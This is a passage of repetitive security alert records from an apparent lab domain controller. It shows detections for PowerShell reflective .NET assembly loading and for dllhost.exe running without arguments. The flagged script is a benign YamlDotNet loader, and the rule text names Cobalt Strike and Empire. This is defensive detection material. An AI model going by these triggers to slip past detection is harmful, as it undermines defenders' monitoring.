[Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664697600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664697600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1908", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664697600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664697600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x774", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664700933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T07:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T07:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664700933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T07:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T07:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664700933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T07:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T07:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664700933, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T07:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T07:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664694000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664694000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="776", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664694000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664694000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x308", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664697331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T06:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T06:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664697331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T06:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T06:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function 